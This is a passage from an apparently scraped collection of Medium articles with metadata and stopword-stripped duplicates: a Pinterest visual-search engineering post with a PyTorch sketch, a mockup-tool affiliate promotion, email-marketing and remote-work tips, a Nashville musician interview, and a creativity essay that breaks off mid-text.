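order, scores = rerank_by_visual_similarity(query, candidates)
print(order, scores)
```

In a real system the visual score would typically be blended with the text-relevance signal rather than replacing it outright.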
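Similarly, the multi-task training described above can be illustrated with a small PyTorch sketch. This is a toy under stated assumptions, not the actual network: the real backbone is a deep CNN, and the head sizes, class counts, and equal loss weighting here are invented. It only shows the core idea of a shared embedding trained with a category loss plus auxiliary attribute and color losses.

```python
import torch
import torch.nn as nn
import torch.nn.functional as F

class MultiTaskFashionNet(nn.Module):
    """Toy multi-task model: one shared embedding, three task heads."""
    def __init__(self, feat_dim=512, emb_dim=128,
                 n_categories=50, n_attributes=100, n_colors=12):
        super().__init__()
        # Stand-in for the convolutional backbone: maps precomputed image
        # features to the shared embedding used by every task head.
        self.shared = nn.Sequential(nn.Linear(feat_dim, emb_dim), nn.ReLU())
        self.category_head = nn.Linear(emb_dim, n_categories)   # single-label
        self.attribute_head = nn.Linear(emb_dim, n_attributes)  # multi-label
        self.color_head = nn.Linear(emb_dim, n_colors)          # single-label

    def forward(self, x):
        emb = self.shared(x)
        return emb, self.category_head(emb), self.attribute_head(emb), self.color_head(emb)

def multitask_loss(outputs, category, attributes, color):
    # Equal weighting of the task losses; in practice the weights are tuned.
    _, cat_logits, attr_logits, color_logits = outputs
    return (F.cross_entropy(cat_logits, category)
            + F.binary_cross_entropy_with_logits(attr_logits, attributes)
            + F.cross_entropy(color_logits, color))

# Toy batch of 4 items with precomputed 512-d image features.
model = MultiTaskFashionNet()
features = torch.randn(4, 512)
loss = multitask_loss(
    model(features),
    category=torch.randint(0, 50, (4,)),
    attributes=torch.randint(0, 2, (4, 100)).float(),
    color=torch.randint(0, 12, (4,)),
)
loss.backward()
```

Because the attribute and color gradients flow through the same shared layer used for retrieval, the embedding is nudged toward separating, say, red-striped shirts from solid navy ones, which is the behavior the post describes.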
https://medium.com/pinterest-engineering/building-lens-your-look-unifying-text-and-camera-search-1b2f3ef4e393
['Pinterest Engineering']
2017-11-15 17:12:49.549000+00:00
['Visual Search', 'AI', 'Computer Vision', 'Neural Networks', 'Deep Learning']
Title Building Lens Look Unifying text camera searchContent Eric Kim Pinterest engineer Visual Search February launched Lens help Pinners find recipe style inspiration product using camera app search Since team working new way integrating Lens Pinterest improve discovery area Pinners love most–particularly fashion–with visual search we’ve learned search better served text others image certain type search it’s best That’s built Lens Look outfit discovery system seamlessly combine text camera search make Pinterest personal stylist Launching today Lens Look enables snap photo item wardrobe add text search see outfit idea inspired item It’s application multimodal search integrate text search camera search give Pinners personalized search experience use largescale objectcentered visual search provide u finergrained understanding visual content Pin Read learn built system powering Lens Look Architecture Multimodal search Lens Look built using two Pinterest’s core system text search visual search combining text search visual search unified architecture power unique search experience like Lens Look unified search architecture consists two stage candidate generation visual reranking Candidate generation Lens Look experience detect user done text search fashion category give option also take photo article clothing using Lens Armed text query image query leverage Pinterest Search generate highquality set candidate Pins text side harness latest greatest Search infrastructure generate set Pins matching user’s original text search query instance user searched “fall outfits” Lens Look find candidate result corpus outfit Pins fall season also use visual cue Lens photo assist candidate generation visual query understanding layer output useful information photo visual object salient color semantic category stylistic attribute metadata combining visual signal Pinterest’s text search infrastructure we’re able generate diverse set candidate Pins visual reranker Visual reranking Next visually rerank candidate Pins respect query image Pinner’s article clothing goal ensure top returned result Pins include clothing closely match query image Lens Look make use visual object detection system allows u visually rerank based object image specific article clothing rather across entire image Reranking visual object give u nuanced view visual content Pin major component allows Lens Look succeed detail visual reranking system see paper recently published WWW 2017 conference Multitask training Teaching fashion visual model objectbased candidate assign visual similarity score candidate Although we’ve written transfer learning method past needed finegrained representation Lens Look Specifically visual embeddings model certain stylistic attribute color pattern texture material allows visual reranking system return result finegrained level instance redstriped shirt matched redstriped shirt bluestriped shirt red plaid shirt accomplish augmented deep convolutional classification network simultaneously train multiple task maintaining shared embedding layer addition typical classification metric learning loss also incorporate taskspecific loss predicting fashion attribute color teach network recognize striped red shirt shouldn’t treated solid navy shirt preliminary result show incorporating multiple training loss lead overall improvement visual retrieval performance we’re excited continue pushing frontier Conclusion Since launching first visual search product 2015 visual search team developed infrastructure support variety new 
feature powering image search Samsung Galaxy S8 today’s launch Lens Look one largest richly annotated image datasets around unending list exciting idea expand improve Pinterest visual search you’d like help u build innovative visual search feature Lens Look join u Acknowledgements Lens Look collaborative effort Pinterest We’d like thank Yiming Jen Kelei Xu Cindy Zhang Josh Beal Andrew Zhai Dmitry Kislyuk Jeffrey Harris Steven Ramkumar Laksh Bhasin collaboration product Trevor Darrell advisement rest visual search teamTags Visual Search AI Computer Vision Neural Networks Deep Learning
3,820
MockupShots: Create Your Own Professional Product Shots in Seconds
Writing and Publishing Tools I Use and Recommend MockupShots: Create Your Own Professional Product Shots in Seconds Launch your 2021 marketing efforts with brand new images of your book covers and other products Image created by Jacquelyn Lynn using MockupShots Creating attractive promotional images of your books and information products takes time, expertise, and money. Even though we have the talent and expertise in-house (thanks to the outstanding photography and design skills of Jerry D. Clement), we use MockUpShots to create shareable images of our books in a variety of settings. MockupShots provides more than 600 relevant images (seasonal, holiday, business, casual, with and without people, and more) that you can drop your book cover (or other packaging) into. In seconds, you can download the image to your computer to use any way you want. Image created by Jacquelyn Lynn using MockupShots It’s super easy to use: Just upload your book cover, browse through the mockups, and download the ones you want. Choose from stills, videos, and gifs. MockupShots includes tutorials that show you exactly what to do. Regular lifetime access to MockupShots is $198, but for a limited time, use the special link at the end of this article to get an awesome 60% discount. Pay just $80 for lifetime access to MockupShots for as many books as you want. Image created by Jacquelyn Lynn using MockupShots Use these images on your website, in your marketing materials, on social media — wherever you need professional images of your books in a variety of settings. New images are added regularly. Use MockupShots just once and you’ve more than recovered your investment by eliminating professional photography fees. Get lifetime access for just $80 — a 60% discount off the regular price of $198. Just use my special affiliate link. Go here for a complete list of the resources we use and recommend. This article was originally published on my site at CreateTeachInspire.com. You can reach me there or email me at [email protected]. You might also enjoy: Here’s a little more about me: Finally, here’s how to get a beautiful inspirational quote delivered to your inbox every Saturday:
https://medium.com/publishing-well/mockupshots-create-your-own-professional-product-shots-in-seconds-6ca003ecfb17
['Jacquelyn Lynn']
2020-12-24 01:35:24.742000+00:00
['Self Publishing', 'Business', 'Writing', 'Creativity', 'Photography']
Title MockupShots Create Professional Product Shots SecondsContent Writing Publishing Tools Use Recommend MockupShots Create Professional Product Shots Seconds Launch 2021 marketing effort brand new image book cover product Image created Jacquelyn Lynn using MockupShots Creating attractive promotional image book information product take time expertise money Even though talent expertise inhouse thanks outstanding photography design skill Jerry Clement use MockUpShots create shareable image book variety setting MockupShots provides 600 relevant image seasonal holiday business casual without people drop book cover packaging second download image computer use way want Image created Jacquelyn Lynn using MockupShots It’s super easy use upload book cover browse mockups download one want Choose still video gifs MockupShots includes tutorial show exactly Regular lifetime access MockupShots 198 limited time use special link end article get awesome 60 discount Pay 80 lifetime access MockupShots many book want Image created Jacquelyn Lynn using MockupShots Use image website marketing material social medium — wherever need professional image book variety setting New image added regularly Use MockupShots you’ve recovered investment eliminating professional photography fee Get lifetime access 80 — 60 discount regular price 198 use special affiliate link Go complete list resource use recommend article originally published site CreateTeachInspirecom reach email jacquelyncontacttcscom might also enjoy Here’s little Finally here’s get beautiful inspirational quote delivered inbox every SaturdayTags Self Publishing Business Writing Creativity Photography
3,821
5 Practical Ways to Build Your Email List Like a Smart Marketer
What’s the secret to a successful email campaign? Great design? Engaging subject lines and email copy? Your offer? It’s actually none of these things — while each, in itself, is important, the most crucial aspect of a successful email campaign is a quality email list. A quality email list is one you’ve built through connection with your audience, based on their registered interest, and ideally, segmented by each person’s preferences. So how can you build a great, effective email list? How can you get more warm leads into your database in order to target them with your future offers? Here are some tips. 1. Website/blog is the best place to take the first step Your website or blog is generally the first thing people visit — so leverage the power of your website and place an email sign-up form on it. When a visitor lands on your blog or site, give him/her a reason to subscribe — offer something valuable in exchange for their information. This could be an educational resource, eBook, white paper, special discount, free demo, or other incentives. See how Blurb does this: 2. Use the power of content upgrade Brian Dean says that content upgrade increased his conversion rate from 0.54% to 4.82%. That’s a 785% increase. Nathan Ellering, Content Marketing Lead at CoSchedule, shared his take here: “Content upgrade is an absolute best way to build an email list of active subscribers, just like how we’ve built a list of more than 100,000 subscribers at CoSchedule.” If you’re not using the power of content upgrade, you’re missing a great opportunity to build your email list. Create an informational and interesting article, and offer an actionable cheatsheet or quick guide as an upgrade. Add a line at the beginning, middle or end of the post that encourages visitors to download your cheat sheet or guide. Here’s a content upgrade example from Brian Dean: 3. Put a signup button on your Facebook Page Social media is a great medium through which to build an audience, and you can also use it to grow your email list. Add a ‘Sign up’ call to action button to your Facebook Page to collect email addresses — it’s a great way to convert your fans/followers into your subscribers. See how Birchbox does a great job by placing a sign-up button on their Facebook page: 4. Hosting a Webinar Hosting a webinar can be a great way to communicate with your targeted audience — and collect email addresses. The best way to do this is to find a trending topic relevant to your service, then conduct a webinar based on that subject. You can then ask potential attendees to provide their contact information in order to join the webinar — and don’t forget to promote it across social media platforms. See how SEMrush adds a registration form to their Webinar page: 5. Run a Facebook Contest Facebook is also a great channel to run a contest or special offer (Instagram, too, can be beneficial on this front). Create a compelling graphic, an engaging title and an irresistible giveaway, then ask your audience for their email address in order to join the contest. Take a look at London Drugs’ Facebook contest: Now that you have five simple, and proven, ways to build a quality email list, it’s time to implement them. Hopefully these tactics will help you to get a good number of subscribers — start building your list today. Call To Action I’m creating an eBook: “Email Now: A Human Guide to Learn the Art of Email Marketing.” Do you want early access to it? Get on VIP List Here.
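None of the above requires much engineering, but to make the idea of capturing sign-ups together with each person’s registered interest (for the segmentation mentioned at the top) concrete, here is a bare-bones sketch. It assumes Flask, the endpoint name and fields are invented for illustration, and in practice you would forward the address to your email service provider rather than keep it in a list in memory.

```python
from flask import Flask, jsonify, request

app = Flask(__name__)
subscribers = []  # stand-in for a real database or email-service integration

@app.route("/subscribe", methods=["POST"])
def subscribe():
    data = request.get_json(force=True)
    email = (data.get("email") or "").strip().lower()
    interest = data.get("interest", "general")  # later used to segment the list
    if "@" not in email:
        return jsonify(error="A valid email address is required."), 400
    subscribers.append({"email": email, "interest": interest})
    return jsonify(message="Thanks! Your free guide is on its way."), 201

if __name__ == "__main__":
    app.run(debug=True)
```

The one habit worth copying even from a toy like this: record the interest or signup source alongside the address from day one, so segmented campaigns are possible later.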
https://medium.com/the-mission/5-practical-ways-to-build-your-email-list-like-a-smart-marketer-2b6854ff09a7
['Pawan Kumar']
2018-07-05 15:47:57.973000+00:00
['Email Marketing', 'Marketing', 'Business', 'Digital Marketing', 'Startup']
Title 5 Practical Ways Build Email List Like Smart MarketerContent What’s secret successful email campaign Great design Engaging subject line email copy offer It’s actually none thing — important crucial aspect successful email campaign quality email list quality email list one you’ve built connection audience based registered interest ideally segmented person’s preference build great effective email list get warm lead onto database order target future offer tip 1 Websiteblog best place take first step website blog generally first thing people visit — leverage power website place email signup form visitor land blog site give himher reason subscribe — offer something valuable exchange information could educational resource eBook white paper special discount free demo incentive See Blurb 2 Use power content upgrade Brian Dean say content upgrade increased conversion rate 054 482 That’s 785 Nathan Ellering Content Marketing Lead CoSchedule shared take “Content upgrade absolute best way build email list active subscriber like we’ve built list 100000 subscriber CoSchedule” you’re using power content upgrade you’re missing great opportunity build email list Create informational interesting article offer actionable cheatsheet quick guide upgrade Add line beginning middle end post encourages visitor download cheat sheet guide Here’s content upgrade example Brian Dean 3 Put signup button Facebook Page Social medium great medium build audience also use grow email list Add ‘Sign up’ call action button Facebook Page collect email address — it’s great way convert fansfollowers subscriber See Birchbox great job placing sign button Facebook page 4 Hosting Webinar Hosting webinar great way communicate targeted audience — collect email address best way find trending topic relevant service conduct webinar based subject ask potential attendee provide contact information order join webinar — don’t forget promote across social medium platform See SEMrush add registration form Webinar page 5 Run Facebook Contest Facebook also great channel run contest special offer Instagram beneficial front Create compelling graphic engaging title irresistible giveaway ask audience email address order join contest Take look London Drugs’ Facebook contest five simple proven way build quality email list it’s time implement Hopefully tactic help get good amount subscriber — start building list today Call Action I’m creating eBook “Email Human Guide Learn Art Email Marketing” want early access Get VIP List HereTags Email Marketing Marketing Business Digital Marketing Startup
3,822
Remote Collaboration for World Domination
Make great work with your team no matter where you are in the world. If you’re part of a large team or a global company, then you’re likely collaborating across time and geography every day. Maybe the developers on your team are in a different country, your design lead travels frequently or your client is in another city. Regardless of your role or location, you could be reviewing specs, testing prototypes, pitching ideas, coordinating meetings, or delivering a workshop at any point in your day. These collaborative efforts between colleagues, stakeholders, and customers are key to the success of any project. When it comes to delivering these tasks remotely, however, individuals can become separated or ‘siloed’ because of poor communication, cultural differences, and time constraints. I’ve been working with internationally dispersed teams for some years now and I wanted to reassure you that working remotely shouldn’t be a barrier for you and your team to co-create successfully. In fact, remote work offers up lots of unique opportunities for both the individuals and the organizations that embrace it! Lots of companies advocate strongly for remote work, InVision and Automattic being two particularly good examples of this. And it makes perfect sense: allowing employees to work from anywhere in the world is not just good for recruitment but it’s also a sure way to increase diversity in your organization. For startups or businesses that want to break into new markets, having a globally dispersed workforce is also a smart way to understand local trends and culture. There are many benefits to remote collaboration but there are also challenges and considerations. If you’re new to this way of working, managing a global team, or considering a transition abroad while hoping to hold onto your current role, these tips (tried and tested) may prove useful to you and your team along the way. 1. Start by building relationships. Good collaboration begins with trust. If you’re working alongside someone (even virtually) it’s important you get to know them. Make an effort to understand their strengths, weaknesses, personality, behaviours, and goals. Chatting about hobbies might sound unimportant in the context of business but when you’re not interacting with your teammates every other day over coffee or lunch, allowing time for this may be more beneficial than you think. People do their best work when they’re comfortable in their environment and trust their co-workers. So, get to know each other! Pro-tip: Carve out an afternoon for your team to share something that is interesting or personal to them. Maybe it’s a hobby or side hustle that reflects what they like to do outside of work. This will help you gain a deeper level of empathy and understanding for your team. Lightning talks or lunch n’ learns are fun platforms for these types of activities. (Although these are traditionally held in person, you can simply use video conferencing software if your team is remote.) 2. Have an agenda and set some goals. Time is precious. To get the best out of your remote session — whether it’s a call, a workshop, a review, etc. — always have an agenda set in advance. Even a loose list of objectives will keep you on track and focused on what needs to get done. Above all, end your session with next steps or a to-do list to help clarify everyone’s responsibilities moving forward. I can’t stress enough how important this is when it comes to remote working.
If you’re in a different time zone, you may not have the opportunity to check in for another day or two (maybe longer), depending on schedules. Be sure that everyone is aligned and clear on their tasks and goals before the working day ends. 3. Tool up. There are so many great digital tools available — lots for free — that enable teams to brainstorm, plan, or workshop in real-time. It might take a little extra time to learn these tools but that investment up front will increase productivity, communication, and transparency in the long run. Some of my favourites: Slack Messaging platform for the workplace. Mural Virtual whiteboard. Perfect for design thinking activities and research synthesis. Trello Easy to use project management tool. Google Docs and Box File sharing in the cloud. InVision Digital product design platform with prototyping tools and helpful resources. Flow For tracking your tasks and projects. GitHub A dev platform that works for anyone. Track tasks, review code or manage projects. Prototypr A one-stop shop for discovering thousands of design resources and tools. 4. Put the phone down. Too often remote collaboration takes the form of a conference call. Unless the situation warrants an over-the-phone conversation, you should avoid dialling in blindly. Body language is a huge part of how we communicate and is far more effective and meaningful than the words we use alone. Using real-time video services like Zoom, WebEx or Skype will help break down some of the linguistic or cultural barriers that might exist across your team. Anyway, conference calls are notoriously unproductive… 5. Get off email. I recently read that email occupies approx. 23% of the average employee’s workday, and that the average employee checks his or her email 36 times an hour. Ugh! So while email may have been radically disruptive some decades ago, it can be more troublesome than useful today. Initially intended for long-form written exchanges, email is now often chosen (or misused) for instant messaging and collaboration. My advice when it comes to email is this: when possible, reduce your inbox by using it to share sensitive or important information only. Instead, choose tools like Slack to stay connected with your colleagues. Messaging platforms like this allow you to have ongoing, short and informal conversations in real-time and on the go.
https://medium.com/design-ibm/remote-collaboration-for-world-domination-e94b2ca724ef
['Lara Hanlon']
2018-07-11 14:38:50.523000+00:00
['Business', 'Collaboration', 'Remote Working', 'Productivity', 'Design']
Title Remote Collaboration World DominationContent Make great work team matter world you’re part large te­am global company you’re likely collaborating across time geography every day Maybe developers­ team different country design lead travel frequently client another city Regardless role locatio­n could reviewing spec testing prototype pitching idea coordinating meeting delivering workshop point day collaborative effort colleague stakeholder customer key success project come delivering task remotely however individual become separated ‘siloed’ poor communication cultural difference time constraint I’ve working internationally dispersed team year wanted reassure working remotely shouldn’t barrier team cocreate successfully fact remote work offer lot unique opportunity individual organization embrace Lots company advocate strongly remote work InVision Automattic two particularly good example make perfect sense allowing employee work anywhere world good recruitment it’s sure way increase diversity organization startup business want break new market globally dispersed workforce also smart way understand local trend culture many benefit remote collaboration also challenge consideration you’re new way working managing global team you’re considering transition abroad hoping hold current role tip tried tested may prove useful team along way 1 Start building relationship Good collaboration begin trust you’re working alongside someone even virtually it’s important get know Make effort understand strength weakness personality behaviour goal Chatting hobby might sound unimportant context business you’re interacting teammate every day coffee lunch allowing time may beneficial think People best work they’re comfortable environment trust coworkers get know Protip Carve afternoon team share something interesting personal Maybe it’s hobby side hustle reflects like outside work help gain deeper level empathy understanding team Lightning talk lunch n’ learns fun platform type activity Although traditionally held inperson simply use video conferencing software team remote 2 agenda set goal Time precious get best remote session — whether it’s call workshop review etc — always agenda set advance Even loose list objective keep track focused need get done end session next step todo list help clarify everyone’s responsibility moving forward can’t stress important come remote working you’re different time zone may opportunity check another day two maybe longer depending schedule sure everyone aligned clear task goal working day end 3 Tool many great digital tool available — lot free — enable team brainstorm plan workshop realtime might take little extra time learn tool investment front increase productivity communication transparency long run favourite Slack Messaging platform workplace Mural Virtual whiteboard Perfect design thinking activity research synthesis Trello Easy use project management tool Google Docs Box File sharing cloud InVision Digital product design platform prototyping tool helpful resource Flow tracking task project GitHub dev platform work anyone Track task review code manage project Prototypr onestop shop discovering thousand design resource tool 4 Put phone often remote collaboration take form conference call Unless situation warrant overthephone conversation avoid dialling blindly Body language huge part communicate far effective meaningful word use alone Using realtime video service like Zoom WebEx Skype help break linguistic cultural barrier might exist across team Anyway conference call 
notoriously unproductive… 5 Get email recently read email occupies approx 23 average employee’s workday average employee check email 36 time hour Ugh email may radically disruptive decade ago troublesome useful today Initially intended long form written exchange often choose misuse email instant messaging collaboration advice come email possible reduce inbox using share sensitive important information Instead choose tool like Slack stay connected colleague Messaging platform like allow ongoing short informal conversation realtime goTags Business Collaboration Remote Working Productivity Design
3,823
Never Done Changing
Never Done Changing Amidst Nashville’s ever-growing community, pop singer/producer Chris Jobe is consistently moving forward. Chris Jobe, 3/30/18 @ The High Watt While leaning against a wall to keep myself from giving in to the urge to nap, I find myself in awe of Chris Jobe’s never-ending energy. About an hour after his performance on March 30th, he continues to make the rounds, enthusiastically greeting and thanking everyone still in the venue. Even as we sit down in the stairwell of the High Watt to begin our interview, he never stops moving. It seems natural for him to constantly be in motion — so natural that when I ask Chris to pose for a photo afterwards and he sits completely still, it’s jarring. While some people might read this constant energy as a sign of someone easily distracted, it becomes clear that he is a talented multi-tasker. We are interrupted several times by passing friends and fans, and when they’ve moved on, he goes right back to speaking where he left off, even when I’ve already forgotten the question. Chris Jobe, 3/30/18 @ The High Watt The 24-year-old singer/songwriter/producer never thought he’d end up in Nashville. After applying to multiple schools in New York and Los Angeles and being daunted by the cost, he received a scholarship from Belmont University and, after learning about their music program, decided to give it a shot. He’s now been in Nashville for six years, happy with the community and the way he’s been able to grow as an artist. It’s clear that change and growth have been a constant for him over the years — and he doesn’t expect that to end anytime soon. “What sort of music do you create?” “Originally, it was going to be sarcastically happy pop stuff, and then it ended up being like more indie pop-type R&B.” “How long have you been writing and performing?” “I was 12 years old when I wrote my first song. My parents had just gotten a divorce and I was taking a poetry class…” he pauses, laughing. “I was a very deep twelve year old, all I listened to was Yellow by Coldplay, and lots of David Bowie and Jimi Hendrix. That was my thing.” He then tells me about his first-ever performance as an 18-year-old new to Nashville. It was at the Hard Rock Cafe, and was “terrible.” “Everything that could have gone wrong went wrong — and it was an ugly Christmas Sweater party, so I was wearing my ugliest sweater that you can imagine. I still hadn’t grown into my face yet, and I looked like a young, tall baby in a grandma’s Christmas sweater — and not doing well either.” image via Halfthestory, 10/16/17 @ The High Watt “Stuff like this is never going to be perfect, so performing is really just a matter of being there for people, being a conduit.” If the energy in the crowds that regularly show up at his shows is any indication, Chris Jobe has left that rough start far behind him. It’s taken a lot of work that continues to this day. “Honestly, I’m quite a perfectionist, and performing is not made for perfectionists. Leading up to a show, I always get so anxious. I try to go in there and capture the vibe of every song — but it’s weird to me because I feel like no matter what I do as a performer, it’s always different.” He states that his favorite part of performing is “stage banter” along with witnessing the crowd’s reactions from the stage. He wants to be connected with the fans as much as he is with the music — but no matter what other people think, he’s going to follow his own instincts.
“Stage,” the song he always opens his live sets with, “is kind of about my parents doubting me growing up. I think it’s an important message for kids — if you really want to do something, don’t whine about it, just do it. Just show your parents, hey, look what I can do.” The fact that now his parents have come around makes it a difficult song for him to continue to connect with, and he’s considering removing it from his set lists, even though it’s a crowd favorite. “Now my parents are very supportive because they’ve seen it all happening. So I’m not pissed at my parents anymore but… I dunno, it’s just this weird thing.” “I’m very competitive, and I know music is not a competition by any means, but I feel inspired and driven by my friends’ success — like this guy is fucking crushing it right now, I hope I can get to that level.” One of the things that is not in question is the viral success of his first single, Thank You Internet. “Thank You Internet is something we rewrote several times because the first time we wrote it, we wrote it as a complete joke, my buddy Kyle and I.” He then sings the original bridge while we sit in the stairwell, sending some passing fans and myself into fits of laughter. “Dog and cat videos, yeah! All that shit can stay. But Kim Kardashian and her fake ass — that shit is lame!” Recovering, I ask him about the production of the video, which seemed extremely large scale for an indie artist. “It took about two or three weeks of planning. I have a bunch of talented friends who came together, and it was one of those things where everything fell into place kind of by luck.” A friend of his who has produced successful music videos in the past helped him with permits for filming locations, and keeping Chris’ “overly ambitious ideas” reined in. One of these ambitious ideas was to reach out to different apps and ask them to help with the animation. “We sent it to Tinder and Bumble and Uber, like hey I want to put you in my video, and the ones who responded listened to the song and were like ‘aren’t you dissing us, why would we pay you or give you a sponsorship?’” He also reached out to an animation company in Indiana that was luckily willing to work with him on a “nearly non-existent budget.” Everything, from the usernames in the video to the locations to the time stamps are extremely intentional. With the combination of catchy, relatable lyrics and excellent animation, once the video was completed, they did get one major social media outlet on board. “Once we had the video all put together, we sent it to Facebook and they were like ‘we love this, we want you to be artist of the day.’ We thought it was crazy, but they released it and we got to watch it grow organically. It’s been amazing.” At the time of this article being published on April 17, 2018, the original post of Thank You Internet on Music on Facebook has had 981,890 views — at the time of the interview on April 1st, it had 846K. “I feel like I have a lot of friends who had a song that’s popped off, and for me to have this video, and having so many people show up on Facebook — which I hadn’t really used because I’m such an Instagram guy — that was a really cool experience.” image via Chris Jobe “I’m not focused on getting a label, I’m just focused on getting to a place where I’m super proud of everything I’m doing, so I can give that over to the fans without anxiety. I feel like I’m on the right track.” Shortly after TYI, he released his second single, Love In The Morning. 
Both are crowd pleasers at his live shows, but he feels more comfortable with the latter. “It’s fun and I like what TYI is about, but stylistically it’s different compared to the other songs that I sing where I’m like, ‘hey this is a piece of my soul, here you go.’” He currently has the release of two more singles planned, and is excited to see how his fans receive them. While creating music may take up the majority of his time, Chris does attempt to make it to his friends shows, and make time for other interests. One of his favorite books is The War of Art by Steven Pressfield, which he recommends to all creative people. He enjoyed the movie Ladybird, and hopes Timothée Chalamet — “the guy that was in Ladybird with the french name, on the cover of GQ, kind of androgynous, really good looking dude…” — would play him if there is ever a movie made about his life. When I ask my final question — if there is a song that isn’t his own that he felt described him — he chooses Changing by John Mayer. “It seems crazy because I’m not personally into country-style music, but it’s some of the best songwriting. ‘I’m not done changing/I may be old and I may be young/but I am not done changing.’ I feel like that’s always relevant for me.” Any creative folks who are anxious about turning their projects into their careers can certainly look to Chris Jobe as an example: Accept that change is inevitable & allow it to fuel your growth. Get ready & stay tuned for Chris Jobe’s upcoming singles by following him on Instagram, Facebook, and Spotify! If you’re in the Nashville area, his next performance is a free show at Analog on April 26th at 8:30pm. Enjoy what you just read? Learn more about Meridian Creators here, give us a like on Facebook, follow us on Instagram & Twitter, and consider supporting our growth by subscribing monthly through Patreon or giving a one-time donation through PayPal!
https://medium.com/meridian-creators/never-done-changing-d685ab455382
['Taralei Griffin']
2018-04-18 00:51:21.337000+00:00
['Nashville', 'Music', 'Interview', 'Creativity', 'Indie']
Title Never Done ChangingContent Never Done Changing Amidst Nashville’s evergrowing community pop singerproducer Chris Jobe consistently moving forward Chris Jobe 33018 High Watt leaning wall keep giving urge nap find awe Chris Jobe’s never ending energy hour performance March 30th continues make round enthusiastically greeting thanking everyone still venue Even sit stairwell High Watt begin interview never stop moving seems natural constantly motion — natural ask Chris pose photo afterwards sits completely still it’s jarring people would see constant energy someone easily distracted becomes clear talented multitasker interrupted several time passing friend fan they’ve moved go right back speaking left even I’ve already forgotten question Chris Jobe 33018 High Watt 24 year old singersongwriterproducer never thought he’d end Nashville applying multiple school New York Los Angeles daunted cost received scholarship Belmont University learning music program decided give shot He’s Nashville six year happy community way he’s able grow artist It’s clear change growth constant year — doesn’t expect end anytime soon “What sort music create” “Originally going sarcastically happy pop stuff ended like indie poptype RB” “How long writing performing” “I 12 year old wrote first song parent gotten divorce taking poetry class…” pause laughing “I deep twelve year old listened Yellow Coldplay lot David Bowie Jimmy Hendrix thing” tell firstever performance 18 year old new Nashville Hard Rock Cafe “terrible” “Everything could gone wrong went wrong — ugly Christmas Sweater party wearing ugliest sweater imagine still hadn’t grown face yet looked like young tall baby grandma’s Christmas sweater — well either” image via Halfthestory 101617 High Watt “Stuff like never going perfect performing really matter people conduit” energy crowd regularly show show indication Chris Jobe left rough start far behind It’s taken lot work continues day “Honestly I’m quite perfectionist performing made perfectionist Leading show always get anxious try go capture vibe every song — it’s weird feel like matter performer it’s always different” state favorite part performing “stage banter” along witnessing crowd’s reaction stage want connected fan much music — matter people think he’s going follow instinct “Stage” song always open live set “is kind parent doubting growing think it’s important message kid — really want something don’t whine show parent hey look do” fact parent come around make difficult song continue connect he’s considering removing set list even though it’s crowd favorite “Now parent supportive they’ve seen happening I’m pissed parent anymore but… dunno it’s weird thing” “I’m competitive know music competition mean feel inspired driven friends’ success — like guy fucking crushing right hope get level” One thing question viral success first single Thank Internet “Thank Internet something rewrote several time first time wrote wrote complete joke buddy Kyle I” sings original bridge sit stairwell sending passing fan fit laughter “Dog cat video yeah shit stay Kim Kardashian fake as — shit lame” Recovering ask production video seemed extremely large scale indie artist “It took two three week planning bunch talented friend came together one thing everything fell place kind luck” friend produced successful music video past helped permit filming location keeping Chris’ “overly ambitious ideas” reined One ambitious idea reach different apps ask help animation “We sent Tinder Bumble Uber like hey want put video one responded 
listened song like ‘aren’t dissing u would pay give sponsorship’” also reached animation company Indiana luckily willing work “nearly nonexistent budget” Everything usernames video location time stamp extremely intentional combination catchy relatable lyric excellent animation video completed get one major social medium outlet board “Once video put together sent Facebook like ‘we love want artist day’ thought crazy released got watch grow organically It’s amazing” time article published April 17 2018 original post Thank Internet Music Facebook 981890 view — time interview April 1st 846K “I feel like lot friend song that’s popped video many people show Facebook — hadn’t really used I’m Instagram guy — really cool experience” image via Chris Jobe “I’m focused getting label I’m focused getting place I’m super proud everything I’m give fan without anxiety feel like I’m right track” Shortly TYI released second single Love Morning crowd pleaser live show feel comfortable latter “It’s fun like TYI stylistically it’s different compared song sing I’m like ‘hey piece soul go’” currently release two single planned excited see fan receive creating music may take majority time Chris attempt make friend show make time interest One favorite book War Art Steven Pressfield recommends creative people enjoyed movie Ladybird hope Timothée Chalamet — “the guy Ladybird french name cover GQ kind androgynous really good looking dude…” — would play ever movie made life ask final question — song isn’t felt described — chooses Changing John Mayer “It seems crazy I’m personally countrystyle music it’s best songwriting ‘I’m done changingI may old may youngbut done changing’ feel like that’s always relevant me” creative folk anxious turning project career certainly look Chris Jobe example Accept change inevitable allow fuel growth Get ready stay tuned Chris Jobe’s upcoming single following Instagram Facebook Spotify you’re Nashville area next performance free show Analog April 26th 830pm Enjoy read Learn Meridian Creators give u like Facebook follow u Instagram Twitter consider supporting growth subscribing monthly Patreon giving onetime donation PayPalTags Nashville Music Interview Creativity Indie
3,824
How to Keep Being Creative When Life Feels Dull and Meaningless
Baltimore Orioles first baseman, Chris Davis, was once one of Major League Baseball’s most-feared juggernauts in the batter’s box. In both 2013 and 2015, he led the majors in home runs and held batting averages of .286 and .262, respectively. But by the end of 2018 and extending into the 2019 season, Davis led the league in another statistic, one far less dominant than the number of times he blasted a baseball out of the park — most at-bats in a row without a single hit. Yep, starting September 14, 2018, and ending April 13, 2019, Davis went 0 for 54, marking a historically abysmal stretch of his career and setting the worst hitting streak record in all of MLB history. On the day his slump finally ended, Davis rejoiced, finishing 3 for 5 with two doubles and four RBIs, raising his batting average from .000 to a whopping .079. Still abysmal, but on the rise. Slumps of Any Kind Are Humbling During the 210 days that Davis went hitless, no doubt he felt humbled and (almost) as human as the rest of us. Switching gears from baseball to creativity, “slumps” are something we all run into as humans, and they’re certainly hurdles I’ve struggled with for as long as I’ve been a writer. I have stretches of days, even weeks, when life feels uninspiring and it’s damn near impossible to type anything worthwhile onto the computer screen. Each subsequent slump I fall into, I can’t help but wonder how many more hints life needs to send me before I finally hang up my cape. I’m repeatedly plagued by the thought that: “Maybe this is a sign I should just quit.” Yet every time, I persevere and break out of the slump, usually with a piece of writing that surprises me and surpasses my wildest expectations. This begs a couple of questions — how do you continue to stay creative when life feels boring or monotonous, and how do you keep moving forward while battling through a massive slump? 1. Remind yourself it’s not the challenge you face but how you respond This holds true with everything that happens to you in life. Sometimes it’s a creative slump, other times misspelling a word in your grade school spelling bee, or reading the rejection letter from your dream college, or being broken up with by your significant other, or suffering the death of a loved one. Challenges come and go, some far more devastating than others, but each time you face one, remind yourself that, though this challenge is different from the others, it’s still just another obstacle in your path. It doesn’t matter what it is — you can’t change or control that. But you can always control how you respond to it. Don’t give up. Keep pushing. Life repeatedly tests you. It wants to try and knock you down, but the strong persevere. 